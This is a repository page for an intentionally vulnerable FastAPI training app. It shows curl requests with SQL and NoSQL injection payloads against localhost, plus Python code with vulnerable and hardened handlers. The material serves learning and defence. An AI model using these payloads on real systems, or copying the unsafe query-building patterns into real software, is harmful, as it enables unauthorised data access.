julioarruda / vfapi

Vulnerable FastAPI in reference to Opensource Web Application Security Project (OWASP) TOP 10: 2021

Home Page: https://git.io/vulnfapi


Vulnerable FastAPI, compliant with OWASP TOP 10: 2021
⚠️ Under Development ⚠️

Vulnerable FastAPI is a simple vulnerable FastAPI application for learning API pentesting on vulnerable API endpoints. Please refer to /docs for information regarding endpoints.


Current exploitation examples

$ export HOST="127.0.0.1"; export PORT=8888

NoSQLi

$ curl -s "http://$HOST:$PORT/find" -H 'Content-Type: application/json' -d '{"id":{"$in":[1,2]}}' | jq

SQLi

$ curl -s "http://$HOST:$PORT/select?username=%22%20OR%201%3D1%3B%20--%20" | jq
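The two requests above work because the handlers forward request data straight into a query. Below is an added example (not code from the vfapi project) with pure-Python stand-ins for the `/select` and `/find` handlers, each beside a hardened version. It assumes the SQL query wraps the username in single quotes (so the page's payload becomes `' OR 1=1 -- `) and that `/find` forwards the JSON `id` value as a MongoDB-style filter; the user table and documents are constructed sample data.

```python
import sqlite3

# Constructed sample data standing in for the app's stores (assumption, not project data).
USERS = [(1, "alice"), (2, "bob"), (3, "carol")]
DOCS = [{"id": 1, "name": "alice"}, {"id": 2, "name": "bob"}, {"id": 3, "name": "carol"}]


def make_db():
    """In-memory SQLite table used for the /select demonstration."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return db


def select_unsafe(db, username):
    """Vulnerable pattern: the query text is assembled by string formatting,
    so a quote in the value closes the literal and the rest becomes SQL."""
    query = f"SELECT id, username FROM users WHERE username = '{username}'"
    return db.execute(query).fetchall()


def select_safe(db, username):
    """Hardened pattern: the value is bound as a parameter and is only ever data."""
    return db.execute("SELECT id, username FROM users WHERE username = ?", (username,)).fetchall()


def find_unsafe(body):
    """Vulnerable pattern: the JSON value for 'id' is used as the filter itself,
    so an operator object such as {"$in": [...]} is honoured (minimal $in stand-in)."""
    wanted = body["id"]
    if isinstance(wanted, dict) and "$in" in wanted:
        return [d for d in DOCS if d["id"] in wanted["$in"]]
    return [d for d in DOCS if d["id"] == wanted]


def find_safe(body):
    """Hardened pattern: only a plain integer id is accepted; dicts, lists,
    strings and bools (a bool is an int subclass) are rejected with None."""
    wanted = body.get("id")
    if isinstance(wanted, bool) or not isinstance(wanted, int):
        return None
    return [d for d in DOCS if d["id"] == wanted]


if __name__ == "__main__":
    db = make_db()
    print(select_unsafe(db, "' OR 1=1 -- "))    # every row leaks
    print(select_safe(db, "' OR 1=1 -- "))      # []
    print(find_unsafe({"id": {"$in": [1, 2]}}))  # two documents
    print(find_safe({"id": {"$in": [1, 2]}}))    # None
```

In the real app the same shape check is what a Pydantic model with `id: int` gives you for free, and the SQL fix is whatever parameter binding the chosen driver offers.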

Thanks

About


License: MIT License


Languages

Python 72.4%, Shell 9.3%, HTML 6.9%, CSS 6.7%, Svelte 3.3%, JavaScript 1.5%